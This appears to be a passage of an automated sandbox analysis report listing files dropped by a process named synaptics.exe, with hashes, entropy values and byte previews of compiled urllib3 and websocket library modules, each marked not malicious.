                                                                                                                                                                                                            Preview:o..........g.........................@...sV...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.)......)...annotationsN)..!MultipartInvariantViolationDefect..StartBoundaryNotFoundDefect.....)...HeaderParsingError..obj..object..return..boolc....................C...s`...z.|.....W.S...t.y.......Y.n.w.z.|.j.W.S...t.y.......Y.n.w.z.|.j.d.u.W.S...t.y/......Y.t.d.....w.).zt. Checks whether a given file-like object is closed... :param obj:. The file-like object to check.. Nz)Unable to determine whether fp is closed.)...isclosed..AttributeError..closed..fp..ValueError).r......r.....RC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\util\response.py..is_fp_closed....s ...................................r......headers..httplib.HTTPMessage..Nonec....................C...sn...t.|.t.j...s.t.d.t.|.....d.......d.}.|.....s#|.....}.t.|.t.t.f...r#|.}.d.d...|.j.D...}.|.s/|.r5t.|.|.d.....d.S.).a>.... Asserts whether all headers have been
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15757
                                                                                                                                                                                                            Entropy (8bit):5.363472425674649
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:9f/8j12FuuccXjtRLJIkyuhvCF4+W8THjSbG9JJb2s5297Y:9JsuPVJvCOWDsG97297Y
                                                                                                                                                                                                            MD5:0F19A18869B1D2A9150115E1FFF056D4
                                                                                                                                                                                                            SHA1:C4823A2BAD341692A42B61FEAB410952418A6D2C
                                                                                                                                                                                                            SHA-256:D12E4406F8B2905E7E32177626A583383AE29B4FD35F09120C1DBFC48FEA0501
                                                                                                                                                                                                            SHA-512:1EA6F304231BAA2EE002A7D4F016F72815F3FA5A51D47D37D9E3998E30A451B758F3EAC048FB85F3E63209DA7464ED56A2D44BC2982A24616EF171936580CE15
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.H.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...e.j.rWd.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e...e...Z.G.d.d...d.e.j ..Z!G.d.d...d...Z"e"d...e"_#d.S.)......)...annotationsN)...takewhile)...TracebackType.....)...ConnectTimeoutError..InvalidHeader..MaxRetryError..ProtocolError..ProxyError..ReadTimeoutError..ResponseError.....)...reraise)...Self)...ConnectionPool)...BaseHTTPResponsec....................@...s6...e.Z.d.Z.U.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.S.)...RequestHistory..str | None..method..url..Exception | None..error..int | None..status..redirect_locationN)...__name__..__module__..__qualname__..__annotations__..r....r.....OC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\util\retry.pyr....!...s................r....c....................@...s"...e.Z.d.Z.U.d.Z.e.g.d.....Z.e.g.d.....Z.e.g.d.....Z.d.Z.d.e.d.<.d.d.d.d.d.d.e.d.d.e.d.d.d.d.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12469
                                                                                                                                                                                                            Entropy (8bit):5.651099613847479
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:UjBb/AE642qEOM00ueLG0d1JK9CZdFyKZA2MlJC9M7:2npEfBbLPfyKZmbC+7
                                                                                                                                                                                                            MD5:5DE50BAB354CA2B5C908129A56A830E3
                                                                                                                                                                                                            SHA1:4B8CD8DFC46D01BA5A61DF2534E19573BEAD29E1
                                                                                                                                                                                                            SHA-256:CE0F0A6D8B6DD5B3B89CCE15A942BFA7F7CEC40CAA52C1B6E55DA102AC624716
                                                                                                                                                                                                            SHA-512:3EF59E0F4580891AD4FBEA3B9271E7439C7EDFC9BA7B33C096A6C633C4EAED5869CAF07DB78D6B54D8805E76E8F002004BD959B6B79F022AEBF081AC6B5D4644
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g&K.......................@...s....U.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.Z.d.Z.d.Z.d.Z.d.g.Z.e.j.e.e.e.e.e.f...Z.d.d...d.D...Z.dcd.d...Z.ddd.d...Z.e.j.r~d.d.l.m.Z...d.d.l.m Z ..d.d.l!m.Z"..G.d.d ..d e d.d!..Z#i.Z$d"e%d#<.z_d.d.l.Z.d.d$l.m&Z&m.Z.m'Z'm(Z(m)Z)m*Z*m+Z+m,Z,m-Z-m.Z.m.Z.m/Z/..e+Z0e.r.e.e)e*e.j1j2e.j3e.j1j2d%k.r.e.j4n.d...s.d.Z.d&D.].Z5z.e6e/e5..e$e6e.d'e5......<.W.q...e7y.......Y.q.w.d.d.l!m.Z...W.n...e8y.......d(Z'd)Z(d*Z-d+Z.d...Z0Z+d,Z,Y.n.w.e.j9d e:d.f...Z;ded1d2..Z<dfd6d7..Z=dgd8d9..Z>............dhdidCdD..Z?e.j@.E.E.E.E.E.E.E.E.E.E.E.EdjdkdUdV....ZAe.j@.E.E.E.E.E.E.E.E.E.E.E.EdjdldXdV....ZA........................dmdldYdV..ZAdnd\d]..ZBdod_d`..ZC..dpdqdadb..ZDd.S.)r.....)...annotationsN)...unhexlify.....)...ProxySchemeUnsupported..SSLError.....)..._BRACELESS_IPV6_ADDRZ_RE.._IPV4_REFz.http/1.1c....................C...s....i.|.].\.}.}.|.t.t.|.d.....q.S...N)...getattr..hashlib)....0..le
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12469
                                                                                                                                                                                                            Entropy (8bit):5.651099613847479
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:UjBb/AE642qEOM00ueLG0d1JK9CZdFyKZA2MlJC9M7:2npEfBbLPfyKZmbC+7
                                                                                                                                                                                                            MD5:5DE50BAB354CA2B5C908129A56A830E3
                                                                                                                                                                                                            SHA1:4B8CD8DFC46D01BA5A61DF2534E19573BEAD29E1
                                                                                                                                                                                                            SHA-256:CE0F0A6D8B6DD5B3B89CCE15A942BFA7F7CEC40CAA52C1B6E55DA102AC624716
                                                                                                                                                                                                            SHA-512:3EF59E0F4580891AD4FBEA3B9271E7439C7EDFC9BA7B33C096A6C633C4EAED5869CAF07DB78D6B54D8805E76E8F002004BD959B6B79F022AEBF081AC6B5D4644
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g&K.......................@...s....U.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.Z.d.Z.d.Z.d.Z.d.g.Z.e.j.e.e.e.e.e.f...Z.d.d...d.D...Z.dcd.d...Z.ddd.d...Z.e.j.r~d.d.l.m.Z...d.d.l.m Z ..d.d.l!m.Z"..G.d.d ..d e d.d!..Z#i.Z$d"e%d#<.z_d.d.l.Z.d.d$l.m&Z&m.Z.m'Z'm(Z(m)Z)m*Z*m+Z+m,Z,m-Z-m.Z.m.Z.m/Z/..e+Z0e.r.e.e)e*e.j1j2e.j3e.j1j2d%k.r.e.j4n.d...s.d.Z.d&D.].Z5z.e6e/e5..e$e6e.d'e5......<.W.q...e7y.......Y.q.w.d.d.l!m.Z...W.n...e8y.......d(Z'd)Z(d*Z-d+Z.d...Z0Z+d,Z,Y.n.w.e.j9d e:d.f...Z;ded1d2..Z<dfd6d7..Z=dgd8d9..Z>............dhdidCdD..Z?e.j@.E.E.E.E.E.E.E.E.E.E.E.EdjdkdUdV....ZAe.j@.E.E.E.E.E.E.E.E.E.E.E.EdjdldXdV....ZA........................dmdldYdV..ZAdnd\d]..ZBdod_d`..ZC..dpdqdadb..ZDd.S.)r.....)...annotationsN)...unhexlify.....)...ProxySchemeUnsupported..SSLError.....)..._BRACELESS_IPV6_ADDRZ_RE.._IPV4_REFz.http/1.1c....................C...s....i.|.].\.}.}.|.t.t.|.d.....q.S...N)...getattr..hashlib)....0..le
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3713
                                                                                                                                                                                                            Entropy (8bit):5.715191540693681
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:SY/R/mYkAMdqu1vkAlH2TIYxfyRGH0MYUFgAL8IzE+wqq3:SXjA2MAV07xjHTgh2Etqq3
                                                                                                                                                                                                            MD5:BD1B43CB6F5C37E4C3CBD0D181E67DA0
                                                                                                                                                                                                            SHA1:5F2247416D1F58DD2E6D465120D2A5BFA3431DD2
                                                                                                                                                                                                            SHA-256:6C9D758830B15F09983CFA74F9991DCB11F76707DB58530F128CA33D19F9CAD4
                                                                                                                                                                                                            SHA-512:5F0FBB9FCAD9A3C94133881DE42FF37A9788378720FAB2D7C45F3FB8F51419A6C330DEC76C7438E6B59BBD310CD55F3EB5447B8CA37D202E4C5C90C9F1BB4C30
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...e.j.r%d.d.l.m.Z...d.Z.G.d.d...d.e...Z...d!d"d.d...Z.d#d.d...Z...d$d%d.d ..Z.d.S.)&zHThe match_hostname() function from Python 3.5, essential when using SSL......)...annotationsN)...IPv4Address..IPv6Address.....)..._TYPE_PEER_CERT_RET_DICTz.3.5.0.1c....................@...s....e.Z.d.Z.d.S.)...CertificateErrorN)...__name__..__module__..__qualname__..r....r.....\C:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\util\ssl_match_hostname.pyr........s........r......dn..typing.Any..hostname..str..max_wildcards..int..return..typing.Match[str] | None | boolc....................C...s....g.}.|.s.d.S.|...d...}.|.d...}.|.d.d.....}.|...d...}.|.|.k.r&t.d.t.|.........|.s2t.|.....|.....k...S.|.d.k.r<|...d.....n.|...d...sF|...d...rO|...t...|.......n.|...t...|.....d.d.......|.D.].}.|...t...|.......q]t...d.d...|.....d...t.j...}.|...|...S.).zhMatching according to RFC 6125, section 6.4.3..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9429
                                                                                                                                                                                                            Entropy (8bit):5.268270757474773
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:4330cuKX0ASvpkv9nfgC+JI/XdABK1sdIDv5YaBbcMhu:4330lKBSvp4hXdcYsyxBYWu
                                                                                                                                                                                                            MD5:34993F3D02A19E7999BE475EC3FB4B78
                                                                                                                                                                                                            SHA1:CAABAA63C55E641BCDF842AA976F646777E82C6C
                                                                                                                                                                                                            SHA-256:889F4110A15BAB878A73A28645AAB4479A7F15F7572DC9CE04FB4F26A730D73C
                                                                                                                                                                                                            SHA-512:742F76918888C6535563462B3033ED42BF1D60DCAB09845784AD681522E708F39D33EEBDA84B843CA8CED18FF9242A8C3A6CC7B141DC9E6339ACBC1A3BD49C63
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.".......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e.j.r-d.d.l.m.Z...d.d.l.m.Z.m.Z...e.j.e.e.f...Z.e...d...Z.d.Z.G.d.d...d...Z.d.S.)......)...annotationsN.....)...ProxySchemeUnsupported)...Self.....)..._TYPE_PEER_CERT_RET.._TYPE_PEER_CERT_RET_DICT.._ReturnValuei.@..c....................@...s....e.Z.d.Z.d.Z.e.dsd.d.....Z.....dtdud.d...Z.dvd.d...Z.dwd.d...Z.dxd.d...Z.dydzd!d"..Z.d{d|d&d'..Z....#d}d~d,d-..Z.d.d.d0d1..Z.d.d.d2d3..Z...d.d.d.d.d4..d.d<d=..Z.d.d>d?..Z.d.d@dA..Z.e.j..Bd.d.dFdG....Z.e.j.d.dJdG....Z.d.d.dMdG..Z.d.dNdO..Z.d.dQdR..Z.d.dSdT..Z.d.dVdW..Z.d.dXdY..Z.d.d\d]..Z.d.d^d_..Z.d.d`da..Z.d.d.dcdd..Z.e.j.d.dgdh....Z.e.j.d.dkdh....Z.e.j.d.dndh....Z.....d.d.drdh..Z.d.S.)...SSLTransportaL.... The SSLTransport wraps an existing socket and establishes an SSL connection... Contrary to Python's implementation of SSLSocket, it allows you to chain. multiple TLS connections together. It's particularly useful if you need to. i
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9609
                                                                                                                                                                                                            Entropy (8bit):5.134511317738487
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:b8vOMrflhdz+7V0MV8K7byybXiCDzQyFF/LCfAChn8l/qxzWOBGawWy8I81GZ5Di:4rn+l/ucy80CBXPqGrpjMKfQHcsyJO
                                                                                                                                                                                                            MD5:C56B1DFE35C0B5AE533BDC495B60E193
                                                                                                                                                                                                            SHA1:21F76BA527965D4F3DDE9FD5A99F5BF0A7A2221B
                                                                                                                                                                                                            SHA-256:FB88CCD2B6E5FA1EF10BFEBEFDEBAA5F66398B0BF087B2150E8C225F14541BC5
                                                                                                                                                                                                            SHA-512:6F4C42C7581A2CB670E35F0973C597467BCF4E99B22EF59D96ED458D3831FC41B1B624958C0537E187C3E3C263348E4C5E1FA584F9E9A6DC08558EAA53800919
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gj(.......................@...s....U.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.r*d.d.l.m.Z...G.d.d...d.e...Z.e.j.Z.d.e.d.<.e.j.e.j.e.e.f.....Z.G.d.d...d...Z.d.S.)......)...annotationsN)...Enum)...getdefaulttimeout.....)...TimeoutStateError)...Finalc....................@...s....e.Z.d.Z.d.Z.d.S.)..._TYPE_DEFAULT.....N)...__name__..__module__..__qualname__..token..r....r.....QC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\util\timeout.pyr........s........r....z.Final[_TYPE_DEFAULT].._DEFAULT_TIMEOUTc....................@...s....e.Z.d.Z.U.d.Z.e.Z.d.e.d.<.d.e.e.f.d$d.d...Z.d%d.d...Z.e.Z.e.d&d.d.....Z.e.d'd.d.....Z.e.d(d.d.....Z.d)d.d...Z.d*d.d...Z.d*d.d...Z.e.d+d d!....Z.e.d,d"d#....Z.d.S.)-..Timeouta....Timeout configuration... Timeouts can be defined as a default for a pool:.. .. code-block:: python.. import urllib3.. timeout = urllib3.util.Timeout(connect=2.0, read=7.0).. http = urllib3.PoolManager(timeout
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11247
                                                                                                                                                                                                            Entropy (8bit):5.784417796827759
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:oVOJJgt54ZqlH/qh/QFYP0YU5HqDtR4qzFYqW1D5hOBdmpInwqH5qVcPoO8RqUvi:oVeJgt54ZqVqhoJxHqDtR4qxYqW1D5k3
                                                                                                                                                                                                            MD5:D1CD8F6D11C69B34AAB6D641FC1B659E
                                                                                                                                                                                                            SHA1:91595E4B7C6A9C217CA8B225CEFF5BC5E43B537F
                                                                                                                                                                                                            SHA-256:17067036F7730A65FA963E15C25C9E05F4B7A886FDFD5E92CDA28609BF2B38C7
                                                                                                                                                                                                            SHA-512:79C4F8F4FDAB3D319F6538A03E26778A4F734AEE92B4E7707C4EF06FA55B1292639C4EE143E3F34DFE12E8E5016F6C8B527E00AD5604B709122EA2033D22DDFC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gm;.......................@...s~...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.e...d...Z.e...d...Z.e...d.e.j.e.j.B...Z.d.Z.d.Z.d.j.e.e.d...Z.e.e.d...Z.g.d...Z.d.Z.d.d...d.d...e.D.......d...Z.d.e...d...Z.d.e...d...e...d...Z.d.Z.e...d...Z.e...d.e...d.....Z.e...d.e...d.....Z.e...d.e...d.....Z.e...d.e.d.d.......d.....Z.e...d e...d!....Z d"e.e.e.f...Z!e...e!e.j.e.j.B...Z"e#d#..Z$e#d$..Z%e$e%B.d%h.B.Z&e&d&d'h.B.Z'e'd(h.B...Z(Z)G.d)d*..d*e..*d*d+e.j+e,..f.d,e.j+e,..f.d-e.j+e,..f.d.e.j+e-..f.d/e.j+e,..f.d0e.j+e,..f.d1e.j+e,..f.g.....Z.e.j/dMd7d8....Z0e.j/dNd:d8....Z0dOd<d8..Z0dPd=d>..Z1e.j/dQd?d@....Z2e.j/dRdAd@....Z2dSdBd@..Z2dTdEdF..Z3dUdHdI..Z4dVdKdL..Z5d.S.)W.....)...annotationsN.....)...LocationParseError.....)...to_str)...http..httpsNz.%[a-fA-F0-9]{2}z.^(?:[a-zA-Z][a-zA-Z0-9+-]*:|/)zS^(?:([a-zA-Z][a-zA-Z0-9+.-]*):)?(?://([^\\/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?$z.(?:[0-9]{1,3}\.){3}[0-9]{1,3}z.[0-9A-Fa-f]{1,4}z.(?:{hex}:{hex}|{ipv4}))...hexZ.ipv4).r....Z.ls32).
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1218
                                                                                                                                                                                                            Entropy (8bit):5.063532623017494
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:c2LkVMQdXRjkhlcRtfGyz4tMXSwgpsqnud9Qzm+6IErGXTSu:OMQdBYhlcv5Wp1KQ9+GXmu
                                                                                                                                                                                                            MD5:79D6700519607FEA736A62CB5E4941C4
                                                                                                                                                                                                            SHA1:5B99D41E0BDFD87CB7344CF03A51AEE28423A4C4
                                                                                                                                                                                                            SHA-256:0AC4692035E1BC1B1F10650034B7A78513D1F51CEBC62E23922E27A90B90812C
                                                                                                                                                                                                            SHA-512:772DA70108C3BB81F7C6AD170A9729CD13832193F2429C0705513BA388D6E09C07881EF2D6D9B7DDFA94CA968D426781EA72E5CB225F6F1DA83E8FCEC2FC02A8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gz........................@...sN...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.....d.d.d.d...Z...d.d.d.d...Z...d.d.d.d...Z.d.S.)......)...annotationsN)...TracebackType..x..str | bytes..encoding..str | None..errors..return..bytesc....................C....R...t.|.t...r.|.S.t.|.t...s.t.d.t.|...j.........|.s.|.r%|.j.|.p.d.|.p"d.d...S.|.....S...Nz.not expecting type z.utf-8..strict).r....)...isinstancer......str..TypeError..type..__name__..encode..r....r....r......r.....NC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\util\util.py..to_bytes.......................r....r....c....................C...r....r....).r....r....r....r....r....r......decoder....r....r....r......to_str....r....r......tp..type[BaseException] | None..value..BaseException..tb..TracebackType | None..typing.NoReturnc....................C...s$...z.|.j.|.u.r.|...|.....|...d.}.d.}.w...N)...__traceback__..with_traceback).r....r....r....r....r....r......reraise....s................r%...).NN).r....r....r....r....r.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2397
                                                                                                                                                                                                            Entropy (8bit):5.158685510240039
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:ay6A4HN1SSpUpLQYvX7ws85K4CE8uG9G0N3Ae8wWv9O3ArDiPh:ay6A4HT1pWvX7h0mh9GcAFwWlIArDiPh
                                                                                                                                                                                                            MD5:6A121A67F6F6DC88B6F4F2C72D9DC369
                                                                                                                                                                                                            SHA1:E27C1D476D9263304F350E04AF29EDE086103AAE
                                                                                                                                                                                                            SHA-256:8F09A2F8FA15194F09121196A433FF280766934A8E59480AAF784057C1428200
                                                                                                                                                                                                            SHA-512:9E268E3D7EF317073F1CB3DC929D66D40F956F28E690E6F58CCB3061B1AAFBCDFA6B2B3B78B3184982D871823A7C74971704DA28CD8FA4339EC004D07779BE3E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gG........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.g.Z.......d.d.d.d...Z.......d.d.d.d...Z.d.d.d...Z.......d.d.d.d...a.d.d.d.d...Z.d.d.d.d...Z.d.S.)......)...annotationsN)...partial..wait_for_read..wait_for_writeF..sock..socket.socket..read..bool..write..timeout..float | None..returnc....................C...sb...|.s.|.s.t.d.....g.}.g.}.|.r.|...|.....|.r.|...|.....t.t.j.|.|.|...}.|.|...\.}.}.}.t.|.p/|.p/|...S.).N.2must specify at least one of read=True, write=True)...RuntimeError..appendr......selectr....).r....r....r....r....Z.rcheckZ.wcheck..fnZ.rreadyZ.wreadyZ.xready..r.....NC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\urllib3\util\wait.py..select_wait_for_socket!...s..........................r....c........................s^...|.s.|.s.t.d.....d.}.|.r.|.t.j.O.}.|.r.|.t.j.O.}.t...........|.|.....d...f.d.d...}.t.|.|.....S.).Nr....r......tr....r......list[tuple[int, int]]c........................s....|.d.u.r.|.d.9.}.....|...S.).Ni....).
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):993
                                                                                                                                                                                                            Entropy (8bit):5.484700831841922
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:Z5G9Zl4IpheU0E+4HQk1Gps2OJjGmfF4E+P:ZAl4+h0CH31KiJjGa7g
                                                                                                                                                                                                            MD5:B072B8EDDC61A7FE19D1D682615F600E
                                                                                                                                                                                                            SHA1:6F5DC0DF8AA433C7506F70640DD0C27B47FE9FBF
                                                                                                                                                                                                            SHA-256:04D9EF6B0EDC30360440F5EF76BF6CA11317AABDCA35AB8133179E43AC3DEA47
                                                                                                                                                                                                            SHA-512:68DF2922F6BCF185E47BE0846DF2BE0AAFC3921823FED0903F5EA9487CEE4BAF120506A040951F93E9258B9367D7CCC0A7E46DA1A2D4A8F924251BD44E982BDA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.........gA........................@...sD...d.Z.d.d.l.T.d.d.l.m.Z.m.Z...d.d.l.T.d.d.l.T.d.d.l.T.d.d.l.T.d.Z.d.S.).ab....__init__.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License.......)...*)...WebSocketApp..setReconnectz.1.8.0N)...__doc__Z._abnfZ._appr....r....Z._core.._exceptionsZ._logging.._socket..__version__..r....r.....OC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\websocket\__init__.py..<module>....s....................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):993
                                                                                                                                                                                                            Entropy (8bit):5.484700831841922
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:Z5G9Zl4IpheU0E+4HQk1Gps2OJjGmfF4E+P:ZAl4+h0CH31KiJjGa7g
                                                                                                                                                                                                            MD5:B072B8EDDC61A7FE19D1D682615F600E
                                                                                                                                                                                                            SHA1:6F5DC0DF8AA433C7506F70640DD0C27B47FE9FBF
                                                                                                                                                                                                            SHA-256:04D9EF6B0EDC30360440F5EF76BF6CA11317AABDCA35AB8133179E43AC3DEA47
                                                                                                                                                                                                            SHA-512:68DF2922F6BCF185E47BE0846DF2BE0AAFC3921823FED0903F5EA9487CEE4BAF120506A040951F93E9258B9367D7CCC0A7E46DA1A2D4A8F924251BD44E982BDA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.........gA........................@...sD...d.Z.d.d.l.T.d.d.l.m.Z.m.Z...d.d.l.T.d.d.l.T.d.d.l.T.d.d.l.T.d.Z.d.S.).ab....__init__.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License.......)...*)...WebSocketApp..setReconnectz.1.8.0N)...__doc__Z._abnfZ._appr....r....Z._core.._exceptionsZ._logging.._socket..__version__..r....r.....OC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\websocket\__init__.py..<module>....s....................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11162
                                                                                                                                                                                                            Entropy (8bit):5.413978092249609
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:pfJmK7mmCkzdMfdx4cIl+UqLcHo36L5FskQJeCiROUppvaZdre82l4rn0WFV:DmTSulap8UCAo3Kn4GHppCe82+rn0o
                                                                                                                                                                                                            MD5:F7E05848C5FF628954C64974018E0DED
                                                                                                                                                                                                            SHA1:3A1098164B573AA8E476AE58411EC48F7B759A1C
                                                                                                                                                                                                            SHA-256:9FC11EAA79106A433AF0301D20581A1D81F0488100BA2DA4D2748497E0E31A19
                                                                                                                                                                                                            SHA-512:E054478F992052123B5BA66B604897A665ED1EBB79BEC17C5815333A2AFA5343FD297C679E1EBFFA343658088E4F1A387BD28625DF302BEE391D202FED55D798
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.........g18.......................@...sJ...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....z.d.d.l.m.Z...d.e.j.d.e.j.d.e.f.d.d...Z.W.n...e.y]......e.j.Z.d.e.j.d.e.j.d.e.f.d.d...Z.Y.n.w.g.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z d.Z!d.Z"d.Z#d.Z$d.Z%e.e.e.e.e.e.e.e e!e"e#e$f.Z&G.d.d...d...Z'G.d d!..d!..Z(G.d"d#..d#..Z)d.S.)$.....N)...Lock)...Callable..Optional..Union.....)...WebSocketPayloadException..WebSocketProtocolException)...validate_utf8)...XorMaskerSimple..mask_value..data_value..returnc....................C...s....t.|.....|...}.|.S...N).r......process).r....r....Z.mask_result..r.....LC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\websocket\_abnf.py.._mask%...s........r....c....................C...sH...t.|...}.t...|.t...}.t...|.|.d.....|.d.|.d.........t...}.|.|.A...|.t...S.).N.....)...len..int..from_bytes..native_byteorder..to_bytes).r....r....Z.datalenZ.int_data_valueZ.int_mask_valuer....r....r....r....-...s.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
